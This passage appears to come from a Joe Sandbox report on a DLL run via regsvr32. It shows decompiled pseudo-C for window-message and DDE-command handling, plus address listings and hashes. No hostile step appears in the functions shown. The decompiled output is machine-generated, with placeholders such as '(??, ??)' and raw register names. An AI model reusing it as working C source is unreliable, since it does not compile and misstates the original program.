					_t66 =  *((intOrPtr*)(_t108 + 8));
					__eflags =  *(_t72 + 0x70);
					if( *(_t72 + 0x70) == 0) {
						GetParent();
						_t74 = __rax;
					}
					E10011808(_t56, _t61, _t70, _t74, _t91, _t101, _t103, _t105);
					__eflags =  *(_t72 + 0xdc) & 0x00000020;
					r13d = 0x201;
					_t100 = _t70;
					if(( *(_t72 + 0xdc) & 0x00000020) != 0) {
						L7:
						__eflags = _t66 - 0x200;
						if(_t66 < 0x200) {
							L9:
							__eflags = _t99 - 0xa0 - 9;
							if(_t99 - 0xa0 > 9) {
								L32:
								E10012674(_t72);
								__eflags = _t70;
								if(_t70 == 0) {
									L34:
									__eflags = _t100;
									if(_t100 == 0) {
										L37:
										_t37 = IsWindow();
										__eflags = _t37;
										if(_t37 == 0) {
											L39:
											__eflags = 0;
											return 0;
										}
										return E1000F330(_t108);
									} else {
										goto L35;
									}
									while(1) {
										L35:
										_t71 =  *_t100;
										_t93 = _t108;
										_t40 =  *((intOrPtr*)(_t71 + 0x200))();
										__eflags = _t40;
										if(_t40 != 0) {
											goto L1;
										}
										E10012624(_t71, _t100, _t93);
										__eflags = _t71;
										_t100 = _t71;
										if(_t71 != 0) {
											continue;
										}
										goto L37;
									}
									goto L1;
								}
								__eflags =  *(_t70 + 0xc4);
								if( *(_t70 + 0xc4) != 0) {
									goto L39;
								}
								goto L34;
							}
							L10:
							E1000A5CC(_t56, _t57, _t61, _t67, _t70, _t74, _t91, _t101, _t103, _t105);
							_t94 =  &_a24;
							_a24 =  *((intOrPtr*)(_t108 + 0x24));
							_t109 = _t70;
							_t44 = ScreenToClient(??, ??);
							_t13 = _t94 + 0x48; // 0x48
							r8d = _t13;
							E1003A240(_t44, _t57, 0,  &_v136,  &_a24, _t101);
							_v136 = 0x38;
							 *((intOrPtr*)( *_t72 + 0xd8))();
							_t84 = _v88;
							__eflags = _v88 - 0xffffffff;
							_t106 = _t70;
							if(_v88 != 0xffffffff) {
								E10039620(_t70, _t84);
							}
							__eflags = _t66 - r13d;
							if(__eflags != 0) {
								L15:
								r13d = 0;
								__eflags = _t66 - 0x201;
								if(_t66 != 0x201) {
									_t53 = GetKeyState();
									__eflags = _t53;
									if(_t53 < 0) {
										_t106 =  *((intOrPtr*)(_t109 + 0x98));
									}
								}
								goto L18;
							} else {
								asm("bt dword [esp+0x24], 0x1f");
								if(__eflags >= 0) {
									goto L15;
								}
								r13d = 1;
								L18:
								__eflags = _t106;
								if(_t106 < 0) {
									L28:
									_t47 = GetKeyState();
									__eflags = _t47;
									if(_t47 >= 0) {
										L30:
										_t70 =  *_t72;
										 *((intOrPtr*)(_t70 + 0x2d0))();
										KillTimer(??, ??);
										L31:
										 *((long long*)(_t109 + 0x98)) = _t106;
										goto L32;
									}
									__eflags = r13d;
									if(r13d == 0) {
										goto L31;
									}
									goto L30;
								}
								__eflags = r13d;
								if(r13d != 0) {
									goto L28;
								}
								__eflags = _t66 - 0x202;
								if(_t66 != 0x202) {
									__eflags =  *(_t72 + 0xd8) & 0x00000008;
									if(( *(_t72 + 0xd8) & 0x00000008) != 0) {
										L27:
										_t70 =  *_t72;
										 *((intOrPtr*)(_t70 + 0x2d0))();
										goto L31;
									}
									_t51 = GetKeyState();
									__eflags = _t51;
									if(_t51 < 0) {
										goto L27;
									}
									__eflags = _t106 -  *((intOrPtr*)(_t109 + 0x98));
									if(_t106 ==  *((intOrPtr*)(_t109 + 0x98))) {
										goto L31;
									}
									r8d = 0x12c;
									L26:
									E10018984();
									goto L31;
								}
								_t70 =  *_t72;
								 *((intOrPtr*)(_t70 + 0x2d0))();
								r8d = 0xc8;
								goto L26;
							}
						}
						__eflags = _t66 - 0x209;
						if(_t66 <= 0x209) {
							goto L10;
						}
						goto L9;
					}
					__eflags = _t66 - r13d;
					if(_t66 == r13d) {
						goto L7;
					}
					__eflags = _t66 - 0x202;
					if(_t66 != 0x202) {
						goto L32;
					}
					goto L7;
				}
				L1:
				return 1;
			}



























                                                                              0x1001963c
                                                                              0x1001963c
                                                                              0x1001963c
                                                                              0x1001963c
                                                                              0x1001963c
                                                                              0x1001963c
                                                                              0x1001963c
                                                                              0x1001963c
                                                                              0x1001963c
                                                                              0x1001964c
                                                                              0x1001964f
                                                                              0x10019659
                                                                              0x10019665
                                                                              0x10019669
                                                                              0x1001966d
                                                                              0x10019670
                                                                              0x10019676
                                                                              0x1001967c
                                                                              0x1001967c
                                                                              0x1001967f
                                                                              0x10019684
                                                                              0x1001968b
                                                                              0x10019691
                                                                              0x10019694
                                                                              0x100196a7
                                                                              0x100196a7
                                                                              0x100196ad
                                                                              0x100196b7
                                                                              0x100196bd
                                                                              0x100196c0
                                                                              0x1001981f
                                                                              0x10019822
                                                                              0x10019827
                                                                              0x1001982a
                                                                              0x10019835
                                                                              0x10019835
                                                                              0x10019838
                                                                              0x10019862
                                                                              0x10019866
                                                                              0x1001986c
                                                                              0x1001986e
                                                                              0x1001987d
                                                                              0x1001987d
                                                                              0x00000000
                                                                              0x1001987d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1001983a
                                                                              0x1001983a
                                                                              0x1001983a
                                                                              0x1001983e
                                                                              0x10019844
                                                                              0x1001984a
                                                                              0x1001984c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10019855
                                                                              0x1001985a
                                                                              0x1001985d
                                                                              0x10019860
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10019860
                                                                              0x00000000
                                                                              0x1001983a
                                                                              0x1001982c
                                                                              0x10019833
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10019833
                                                                              0x100196c6
                                                                              0x100196c6
                                                                              0x100196cf
                                                                              0x100196d7
                                                                              0x100196e3
                                                                              0x100196e6
                                                                              0x100196f3
                                                                              0x100196f3
                                                                              0x100196f7
                                                                              0x1001970f
                                                                              0x10019717
                                                                              0x1001971e
                                                                              0x10019723
                                                                              0x10019727
                                                                              0x1001972a
                                                                              0x1001972c
                                                                              0x1001972c
                                                                              0x10019731
                                                                              0x10019734
                                                                              0x10019746
                                                                              0x10019746
                                                                              0x10019749
                                                                              0x1001974f
                                                                              0x10019755
                                                                              0x1001975b
                                                                              0x1001975e
                                                                              0x10019760
                                                                              0x10019760
                                                                              0x1001975e
                                                                              0x00000000
                                                                              0x10019736
                                                                              0x10019736
                                                                              0x1001973c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1001973e
                                                                              0x10019767
                                                                              0x10019767
                                                                              0x1001976a
                                                                              0x100197e1
                                                                              0x100197e6
                                                                              0x100197ec
                                                                              0x100197ef
                                                                              0x100197f6
                                                                              0x100197f6
                                                                              0x10019803
                                                                              0x10019812
                                                                              0x10019818
                                                                              0x10019818
                                                                              0x00000000
                                                                              0x10019818
                                                                              0x100197f1
                                                                              0x100197f4
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100197f4
                                                                              0x1001976c
                                                                              0x1001976f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10019771
                                                                              0x10019777
                                                                              0x10019799
                                                                              0x100197a0
                                                                              0x100197d0
                                                                              0x100197d0
                                                                              0x100197d9
                                                                              0x00000000
                                                                              0x100197d9
                                                                              0x100197a7
                                                                              0x100197ad
                                                                              0x100197b0
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100197b2
                                                                              0x100197b9
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100197c0
                                                                              0x100197c6
                                                                              0x100197c9
                                                                              0x00000000
                                                                              0x100197c9
                                                                              0x10019779
                                                                              0x10019786
                                                                              0x10019791
                                                                              0x00000000
                                                                              0x10019791
                                                                              0x10019734
                                                                              0x100196af
                                                                              0x100196b5
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100196b5
                                                                              0x10019696
                                                                              0x10019699
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1001969b
                                                                              0x100196a1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100196a1
                                                                              0x1001965b
                                                                              0x00000000

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: ClientParentScreenWindow
                                                                              • String ID: $8
                                                                              • API String ID: 329865726-518440650
                                                                              • Opcode ID: fc1edd2d6101d9cab176c2532639df380596c5312344a9d22e592ca032580c4a
                                                                              • Instruction ID: 369a295554a406946ddf972f0e64cd4c00458d77477229902934cec212b81106
                                                                              • Opcode Fuzzy Hash: fc1edd2d6101d9cab176c2532639df380596c5312344a9d22e592ca032580c4a
                                                                              • Instruction Fuzzy Hash: 85519C36705A8185EB15DF22D8547AE23A1FB86FE8F164222DE2A4F3D5DF39C4C98701
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10035BBC Relevance: 14.7, APIs: 4, Strings: 4, Instructions: 655windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 82%
                                                                              			E10035BBC(signed int __ebx, signed int __ecx, void* __edx, void* __esi, void* __ebp, void* __eflags, void* __rcx, void* __rdx, intOrPtr __r8, void* __r9, void* __r11, char _a24, char _a32) {
				long long _v72;
				char _v80;
				char _v88;
				char _v96;
				char _v104;
				char _v112;
				char _v120;
				char _v128;
				char _v136;
				char _v144;
				char _v152;
				char _v160;
				char _v168;
				char _v176;
				char _v184;
				char _v192;
				char _v200;
				char _v208;
				char _v216;
				char _v224;
				char _v232;
				char _v240;
				char _v248;
				char _v256;
				signed int _v260;
				char _v280;
				void* __rdi;
				void* __rbp;
				void* __r12;
				signed int _t214;
				signed int _t345;
				signed int _t346;
				signed int _t347;
				signed int _t348;
				signed int _t355;
				void* _t358;
				char _t380;
				void* _t382;
				intOrPtr _t425;
				intOrPtr _t485;
				intOrPtr* _t502;
				intOrPtr* _t506;
				intOrPtr* _t510;
				intOrPtr* _t512;
				intOrPtr* _t516;
				intOrPtr* _t518;
				intOrPtr* _t522;
				intOrPtr* _t526;
				intOrPtr* _t529;
				intOrPtr* _t533;
				intOrPtr* _t537;
				intOrPtr* _t541;
				intOrPtr* _t545;
				intOrPtr* _t549;
				intOrPtr* _t553;
				intOrPtr* _t557;
				intOrPtr* _t561;
				intOrPtr* _t565;
				intOrPtr* _t569;
				intOrPtr* _t573;
				intOrPtr* _t577;
				intOrPtr* _t582;
				intOrPtr* _t586;
				void* _t587;
				intOrPtr* _t588;
				intOrPtr _t589;
				signed int _t590;
				intOrPtr* _t591;
				void* _t596;
				void* _t598;

				_t597 = __r11;
				_t596 = __r9;
				_t594 = __r8;
				_t498 = __rdx;
				_t358 = __ebp;
				_t356 = __esi;
				_t353 = __edx;
				_t350 = __ecx;
				_t378 = _t591;
				_v72 = 0xfffffffe;
				_t598 = __rcx;
				L10009D5C(__ebx, _t591, _t591 + 0x48, __rdx);
				E10025D30(__edx,  &_v280, _t498, _t587, __r8, __r9, __r11);
				_v260 = 4;
				r8d = 7;
				E100348AC(__ebx, __edx, __esi, _t591,  &_a24,  &_a32, __r8, __r9, __r11);
				_t345 = __ebx & 0xffffff00 | E1003AE40( *_t378, L"[open(\"") == 0x00000000;
				_t502 = _a32 + 0xffffffe8;
				r14d = 0xffffffff;
				asm("lock xadd [edx+0x10], eax");
				if(r14d + r14d <= 0) {
					_t378 =  *((intOrPtr*)( *_t502));
					 *((intOrPtr*)( *((intOrPtr*)( *_t502)) + 8))();
				}
				_t355 = 1;
				if(_t345 == 0) {
					r8d = 8;
					E100348AC(_t345, _t353, _t356, _t378,  &_a24,  &_v88, _t594, _t596, _t597);
					_t346 = _t345 & 0xffffff00 | E1003AE40( *_t378, L"[print(\"") == 0x00000000;
					_t506 = _v88 + 0xffffffe8;
					asm("lock xadd [edx+0x10], eax");
					if(r14d + r14d <= 0) {
						_t378 =  *((intOrPtr*)( *_t506));
						 *((intOrPtr*)( *((intOrPtr*)( *_t506)) + 8))();
					}
					if(_t346 == 0) {
						r8d = 0xa;
						E100348AC(_t346, _t353, _t356, _t378,  &_a24,  &_v80, _t594, _t596, _t597);
						_t346 = _t346 & 0xffffff00 | E1003AE40( *_t378, L"[printto(\"") == 0x00000000;
						_t510 = _v80 + 0xffffffe8;
						asm("lock xadd [edx+0x10], eax");
						if(r14d + r14d <= 0) {
							 *((intOrPtr*)( *((intOrPtr*)( *_t510)) + 8))();
						}
						if(_t346 == 0) {
							E10025E00( &_v280);
							_t512 = _a24 + 0xffffffe8;
							asm("lock xadd [edx+0x10], eax");
							if(r14d + r14d <= 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t512)) + 8))();
							}
							_t214 = 0;
							goto L90;
						} else {
							_v260 = 3;
							_t380 = _a24;
							r8d =  *(_t380 - 0x10);
							r8d = r8d + 0xfffffff6;
							E10034818(_t346, _t353, _t356, _t358, _t380,  &_a24,  &_v192, _t594, _t596, _t597);
							E1001A4B4(_t346, _t356,  &_a24, _t380, _t594, _t598);
							_t516 = _v192 + 0xffffffe8;
							asm("lock xadd [edx+0x10], eax");
							if(r14d + r14d <= 0) {
								_t380 =  *((intOrPtr*)( *_t516));
								 *((intOrPtr*)(_t380 + 8))();
							}
							goto L15;
						}
					} else {
						_v260 = 2;
						_t380 = _a24;
						r8d =  *(_t380 - 0x10);
						r8d = r8d + 0xfffffff8;
						E10034818(_t346, _t353, _t356, _t358, _t380,  &_a24,  &_v208, _t594, _t596, _t597);
						E1001A4B4(_t346, _t356,  &_a24, _t380, _t594, _t598);
						_t582 = _v208 + 0xffffffe8;
						asm("lock xadd [edx+0x10], eax");
						if(r14d + r14d <= 0) {
							_t380 =  *((intOrPtr*)( *_t582));
							 *((intOrPtr*)(_t380 + 8))();
						}
						goto L15;
					}
				} else {
					_v260 = 1;
					_t380 = _a24;
					r8d =  *(_t380 - 0x10);
					r8d = r8d + 0xfffffff9;
					E10034818(_t345, _t353, _t356, _t358, _t380,  &_a24,  &_v144, _t594, _t596, _t597);
					E1001A4B4(_t345, _t356,  &_a24, _t380, _t594, _t598);
					_t586 = _v144 + 0xffffffe8;
					asm("lock xadd [edx+0x10], eax");
					if(r14d + r14d <= 0) {
						_t380 =  *((intOrPtr*)( *_t586));
						 *((intOrPtr*)(_t380 + 8))();
					}
					L15:
					_t414 = _a24;
					if( *((intOrPtr*)(_a24 - 0x10)) <= 0) {
						L84:
						E10025E00( &_v280);
						_t518 = _a24 + 0xffffffe8;
						asm("lock xadd [edx+0x10], eax");
						if(r14d + r14d <= 0) {
							 *((intOrPtr*)( *((intOrPtr*)( *_t518)) + 8))();
						}
						_t214 = 0;
						L90:
						return _t214;
					}
					_t354 = 0x22;
					E1003B1F0(0x22, _t414);
					if(_t380 == 0 || _t346 == r14d) {
						goto L84;
					} else {
						r8d = _t346;
						E100348AC(_t346, 0x22, 0x22, _t380,  &_a24,  &_v128, _t594, _t596, _t597);
						E1001A4B4(_t346, 0x22,  &_v256, _t380, _t594, _t598);
						_t522 = _v128 + 0xffffffe8;
						asm("lock xadd [edx+0x10], eax");
						if(r14d + r14d <= 0) {
							 *((intOrPtr*)( *((intOrPtr*)( *_t522)) + 8))();
						}
						_t382 = _a24;
						r8d =  *(_t382 - 0x10);
						r8d = r8d - _t346;
						E10034818(_t346, _t354, 0x22, _t358, _t382,  &_a24,  &_v176, _t594, _t596, _t597);
						E1001A4B4(_t346, 0x22,  &_a24, _t382, _t594, _t598);
						_t526 = _v176 + 0xffffffe8;
						asm("lock xadd [edx+0x10], eax");
						if(r14d + r14d <= 0) {
							_t382 =  *((intOrPtr*)( *_t526));
							 *((intOrPtr*)(_t382 + 8))();
						}
						E1000A57C(_t346, _t350, _t354, 0x22, _t382, _t594, _t596, _t597);
						if( *( *((intOrPtr*)(_t382 + 8)) + 0x118) == _t590) {
							E1000A57C(_t346, _t350, _t354, 0x22, _t382, _t594, _t596, _t597);
							_t590 =  *( *((intOrPtr*)(_t382 + 8)) + 0x118);
						} else {
							E1000A57C(_t346, _t350, _t354, 0x22, _t382, _t594, _t596, _t597);
							E1000A57C(_t346, _t350, _t354, 0x22, _t382, _t594, _t596, _t597);
							 *( *((intOrPtr*)(_t382 + 8)) + 0x98) =  *( *((intOrPtr*)(_t382 + 8)) + 0x118);
							E1000A57C(_t346, _t350, _t354, 0x22, _t382, _t594, _t596, _t597);
							_t485 =  *((intOrPtr*)(_t382 + 8));
							_t382 =  &_v280;
							 *((long long*)(_t485 + 0x118)) = _t382;
						}
						if(_v260 != _t355) {
							if(_v260 != 3) {
								L77:
								_t347 = E10033FB4(_t598);
								E1000A57C(_t347, _t350, _t354, 0x22, _t382, _t594, _t596, _t597);
								_t594 =  *((intOrPtr*)( *((intOrPtr*)(_t382 + 8))));
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t382 + 8)))) + 0x110))();
								_t588 = _t382;
								E1000A57C(_t347, _t350, _t354, 0x22, _t382,  *((intOrPtr*)( *((intOrPtr*)(_t382 + 8)))), _t596, _t597);
								_t425 =  *((intOrPtr*)(_t382 + 8));
								_t382 =  &_v280;
								 *((long long*)(_t425 + 0x118)) = _t382;
								E1000A57C(_t347, _t350, _t354, 0x22, _t382, _t594, _t596, _t597);
								r9d = 0;
								_t354 = 0x111;
								r8d = 0xe108;
								SendMessageW(??, ??, ??, ??);
								E1000A57C(_t347, _t350, 0x111, 0x22, _t382, _t594, _t596, _t597);
								 *( *((intOrPtr*)(_t382 + 8)) + 0x118) = 0;
								if(E10033FB4(_t598) > _t347) {
									_t382 =  *_t588;
									 *((intOrPtr*)(_t382 + 0xf8))();
								}
								if(E1002BB48(_t382) == 0) {
									E1000A57C(_t347, _t350, _t354, 0x22, _t382, _t594, _t596, _t597);
									r9d = 0;
									r8d = 0;
									_t184 = _t596 + 0x10; // 0x10
									_t354 = _t184;
									PostMessageW(??, ??, ??, ??);
								}
								goto L81;
							}
							r8d = 3;
							E100348AC(_t346, _t354, 0x22, _t382,  &_a24,  &_v96, _t594, _t596, _t597);
							_t347 = _t346 & 0xffffff00 | E1003AE40( *_t382, 0x1005d0f0) != 0x00000000;
							_t533 = _v96 + 0xffffffe8;
							asm("lock xadd [edx+0x10], eax");
							if(r14d + r14d <= 0) {
								_t382 =  *((intOrPtr*)( *_t533));
								 *((intOrPtr*)(_t382 + 8))();
							}
							if(_t347 == 0) {
								_t382 = _a24;
								r8d =  *(_t382 - 0x10);
								r8d = r8d + 0xfffffffd;
								E10034818(_t347, _t354, 0x22, 0, _t382,  &_a24,  &_v160, _t594, _t596, _t597);
								E1001A4B4(_t347, 0x22,  &_a24, _t382, _t594, _t598);
								_t537 = _v160 + 0xffffffe8;
								asm("lock xadd [edx+0x10], eax");
								if(r14d + r14d <= 0) {
									_t382 =  *((intOrPtr*)( *_t537));
									 *((intOrPtr*)(_t382 + 8))();
								}
								_t442 = _a24;
								if( *((intOrPtr*)(_a24 - 0x10)) <= 0) {
									L76:
									_t355 = 0;
									goto L81;
								} else {
									_t354 = 0x22;
									E1003B1F0(0x22, _t442);
									if(_t382 == 0 || _t347 == r14d) {
										goto L76;
									} else {
										r8d = _t347;
										E100348AC(_t347, 0x22, 0x22, _t382,  &_a24,  &_v112, _t594, _t596, _t597);
										E1001A4B4(_t347, 0x22,  &_v248, _t382, _t594, _t598);
										_t541 = _v112 + 0xffffffe8;
										asm("lock xadd [edx+0x10], eax");
										if(r14d + r14d <= 0) {
											 *((intOrPtr*)( *((intOrPtr*)( *_t541)) + 8))();
										}
										_t382 = _a24;
										r8d =  *(_t382 - 0x10);
										r8d = r8d - _t347;
										E10034818(_t347, _t354, 0x22, 0, _t382,  &_a24,  &_v224, _t594, _t596, _t597);
										E1001A4B4(_t347, 0x22,  &_a24, _t382, _t594, _t598);
										_t545 = _v224 + 0xffffffe8;
										asm("lock xadd [edx+0x10], eax");
										if(r14d + r14d <= 0) {
											_t382 =  *((intOrPtr*)( *_t545));
											 *((intOrPtr*)(_t382 + 8))();
										}
										r8d = 3;
										E100348AC(_t347, _t354, 0x22, _t382,  &_a24,  &_v216, _t594, _t596, _t597);
										_t347 = _t347 & 0xffffff00 | E1003AE40( *_t382, 0x1005d0f0) != 0x00000000;
										_t549 = _v216 + 0xffffffe8;
										asm("lock xadd [edx+0x10], eax");
										if(r14d + r14d <= 0) {
											_t382 =  *((intOrPtr*)( *_t549));
											 *((intOrPtr*)(_t382 + 8))();
										}
										if(_t347 == 0) {
											_t382 = _a24;
											r8d =  *(_t382 - 0x10);
											r8d = r8d + 0xfffffffd;
											E10034818(_t347, _t354, 0x22, 0, _t382,  &_a24,  &_v200, _t594, _t596, _t597);
											E1001A4B4(_t347, 0x22,  &_a24, _t382, _t594, _t598);
											_t553 = _v200 + 0xffffffe8;
											asm("lock xadd [edx+0x10], eax");
											if(r14d + r14d <= 0) {
												_t382 =  *((intOrPtr*)( *_t553));
												 *((intOrPtr*)(_t382 + 8))();
											}
											_t451 = _a24;
											if( *((intOrPtr*)(_a24 - 0x10)) <= 0) {
												L75:
												_t355 = 0;
												goto L81;
											} else {
												_t354 = 0x22;
												E1003B1F0(0x22, _t451);
												if(_t382 == 0 || _t347 == r14d) {
													goto L75;
												} else {
													r8d = _t347;
													E100348AC(_t347, 0x22, 0x22, _t382,  &_a24,  &_v184, _t594, _t596, _t597);
													E1001A4B4(_t347, 0x22,  &_v240, _t382, _t594, _t598);
													_t557 = _v184 + 0xffffffe8;
													asm("lock xadd [edx+0x10], eax");
													if(r14d + r14d <= 0) {
														 *((intOrPtr*)( *((intOrPtr*)( *_t557)) + 8))();
													}
													_t382 = _a24;
													r8d =  *(_t382 - 0x10);
													r8d = r8d - _t347;
													E10034818(_t347, _t354, 0x22, 0, _t382,  &_a24,  &_v168, _t594, _t596, _t597);
													E1001A4B4(_t347, 0x22,  &_a24, _t382, _t594, _t598);
													_t561 = _v168 + 0xffffffe8;
													asm("lock xadd [edx+0x10], eax");
													if(r14d + r14d <= 0) {
														_t382 =  *((intOrPtr*)( *_t561));
														 *((intOrPtr*)(_t382 + 8))();
													}
													r8d = 3;
													E100348AC(_t347, _t354, 0x22, _t382,  &_a24,  &_v152, _t594, _t596, _t597);
													_t347 = _t347 & 0xffffff00 | E1003AE40( *_t382, 0x1005d0f0) != 0x00000000;
													_t565 = _v152 + 0xffffffe8;
													asm("lock xadd [edx+0x10], eax");
													if(r14d + r14d <= 0) {
														_t382 =  *((intOrPtr*)( *_t565));
														 *((intOrPtr*)(_t382 + 8))();
													}
													if(_t347 == 0) {
														_t382 = _a24;
														r8d =  *(_t382 - 0x10);
														r8d = r8d + 0xfffffffd;
														E10034818(_t347, _t354, 0x22, 0, _t382,  &_a24,  &_v136, _t594, _t596, _t597);
														E1001A4B4(_t347, 0x22,  &_a24, _t382, _t594, _t598);
														_t569 = _v136 + 0xffffffe8;
														asm("lock xadd [edx+0x10], eax");
														if(r14d + r14d <= 0) {
															_t382 =  *((intOrPtr*)( *_t569));
															 *((intOrPtr*)(_t382 + 8))();
														}
														_t460 = _a24;
														if( *((intOrPtr*)(_a24 - 0x10)) <= 0) {
															L74:
															_t355 = 0;
															goto L81;
														} else {
															_t354 = 0x22;
															E1003B1F0(0x22, _t460);
															if(_t382 == 0 || _t347 == r14d) {
																goto L74;
															} else {
																r8d = _t347;
																E100348AC(_t347, 0x22, 0x22, _t382,  &_a24,  &_v120, _t594, _t596, _t597);
																E1001A4B4(_t347, 0x22,  &_v232, _t382, _t594, _t598);
																_t573 = _v120 + 0xffffffe8;
																asm("lock xadd [edx+0x10], eax");
																if(r14d + r14d <= 0) {
																	 *((intOrPtr*)( *((intOrPtr*)( *_t573)) + 8))();
																}
																_t382 = _a24;
																r8d =  *(_t382 - 0x10);
																r8d = r8d - _t347;
																E10034818(_t347, _t354, 0x22, 0, _t382,  &_a24,  &_v104, _t594, _t596, _t597);
																E1001A4B4(_t347, 0x22,  &_a24, _t382, _t594, _t598);
																_t577 = _v104 + 0xffffffe8;
																asm("lock xadd [edx+0x10], eax");
																if(r14d + r14d <= 0) {
																	_t382 =  *((intOrPtr*)( *_t577));
																	 *((intOrPtr*)(_t382 + 8))();
																}
																goto L77;
															}
														}
													} else {
														_t355 = 0;
														goto L81;
													}
												}
											}
										} else {
											_t355 = 0;
											goto L81;
										}
									}
								}
							} else {
								_t355 = 0;
								goto L81;
							}
						} else {
							E1000A57C(_t346, _t350, _t354, 0x22, _t382, _t594, _t596, _t597);
							_t589 =  *((intOrPtr*)( *((intOrPtr*)(_t382 + 8)) + 0x40));
							E1000A57C(_t346, _t350, _t354, 0x22, _t382, _t594, _t596, _t597);
							_t348 =  *( *((intOrPtr*)(_t382 + 8)) + 0x98);
							if(_t348 == r14d || _t348 == _t355) {
								IsIconic();
								asm("sbb ebx, ebx");
								_t347 = (_t348 & 0x00000004) + 5;
							}
							_t354 = _t347;
							E10016154(_t589);
							if(_t347 != 6) {
								SetForegroundWindow();
							}
							E1000A57C(_t347, _t350, _t354, 0x22, _t382, _t594, _t596, _t597);
							_t382 =  *((intOrPtr*)( *((intOrPtr*)(_t382 + 8))));
							 *((intOrPtr*)(_t382 + 0x110))();
							if(E1002BB48(_t382) == 0) {
								_t350 = _t355;
								E1002BB30(_t355, _t382);
							}
							E1000A57C(_t347, _t350, _t354, 0x22, _t382, _t594, _t596, _t597);
							 *( *((intOrPtr*)(_t382 + 8)) + 0x98) = r14d;
							L81:
							E1000A57C(_t347, _t350, _t354, 0x22, _t382, _t594, _t596, _t597);
							 *( *((intOrPtr*)(_t382 + 8)) + 0x118) = _t590;
							E10025E00( &_v280);
							_t529 = _a24 + 0xffffffe8;
							asm("lock xadd [edx+0x10], ecx");
							if(r14d + r14d <= 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t529)) + 8))();
							}
							_t214 = _t355;
							goto L90;
						}
					}
				}
			}









































































                                                                              0x10035bbc
                                                                              0x10035bbc
                                                                              0x10035bbc
                                                                              0x10035bbc
                                                                              0x10035bbc
                                                                              0x10035bbc
                                                                              0x10035bbc
                                                                              0x10035bbc
                                                                              0x10035bc5
                                                                              0x10035bcf
                                                                              0x10035bdb
                                                                              0x10035be2
                                                                              0x10035bed
                                                                              0x10035bf3
                                                                              0x10035bfb
                                                                              0x10035c11
                                                                              0x10035c27
                                                                              0x10035c32
                                                                              0x10035c36
                                                                              0x10035c3f
                                                                              0x10035c49
                                                                              0x10035c4e
                                                                              0x10035c51
                                                                              0x10035c51
                                                                              0x10035c54
                                                                              0x10035c5b
                                                                              0x10035cc5
                                                                              0x10035cdb
                                                                              0x10035cf1
                                                                              0x10035cfc
                                                                              0x10035d03
                                                                              0x10035d0d
                                                                              0x10035d12
                                                                              0x10035d15
                                                                              0x10035d15
                                                                              0x10035d1a
                                                                              0x10035d82
                                                                              0x10035d98
                                                                              0x10035dae
                                                                              0x10035db9
                                                                              0x10035dc0
                                                                              0x10035dca
                                                                              0x10035dd2
                                                                              0x10035dd2
                                                                              0x10035dd7
                                                                              0x10036617
                                                                              0x10036625
                                                                              0x1003662c
                                                                              0x10036636
                                                                              0x1003663e
                                                                              0x1003663e
                                                                              0x10036641
                                                                              0x00000000
                                                                              0x10035ddd
                                                                              0x10035ddd
                                                                              0x10035de5
                                                                              0x10035ded
                                                                              0x10035df1
                                                                              0x10035e02
                                                                              0x10035e13
                                                                              0x10035e1e
                                                                              0x10035e25
                                                                              0x10035e2f
                                                                              0x10035e34
                                                                              0x10035e37
                                                                              0x10035e37
                                                                              0x00000000
                                                                              0x10035e2f
                                                                              0x10035d1c
                                                                              0x10035d1c
                                                                              0x10035d24
                                                                              0x10035d2c
                                                                              0x10035d30
                                                                              0x10035d41
                                                                              0x10035d52
                                                                              0x10035d5d
                                                                              0x10035d64
                                                                              0x10035d6e
                                                                              0x10035d77
                                                                              0x10035d7a
                                                                              0x10035d7a
                                                                              0x00000000
                                                                              0x10035d6e
                                                                              0x10035c5d
                                                                              0x10035c5d
                                                                              0x10035c61
                                                                              0x10035c69
                                                                              0x10035c6d
                                                                              0x10035c81
                                                                              0x10035c92
                                                                              0x10035ca0
                                                                              0x10035ca7
                                                                              0x10035cb1
                                                                              0x10035cba
                                                                              0x10035cbd
                                                                              0x10035cbd
                                                                              0x10035e3a
                                                                              0x10035e3a
                                                                              0x10035e46
                                                                              0x100365df
                                                                              0x100365e4
                                                                              0x100365f2
                                                                              0x100365f9
                                                                              0x10036603
                                                                              0x1003660b
                                                                              0x1003660b
                                                                              0x1003660e
                                                                              0x10036643
                                                                              0x10036652
                                                                              0x10036652
                                                                              0x10035e50
                                                                              0x10035e53
                                                                              0x10035e5e
                                                                              0x00000000
                                                                              0x10035e78
                                                                              0x10035e78
                                                                              0x10035e8b
                                                                              0x10035e99
                                                                              0x10035ea7
                                                                              0x10035eae
                                                                              0x10035eb8
                                                                              0x10035ec0
                                                                              0x10035ec0
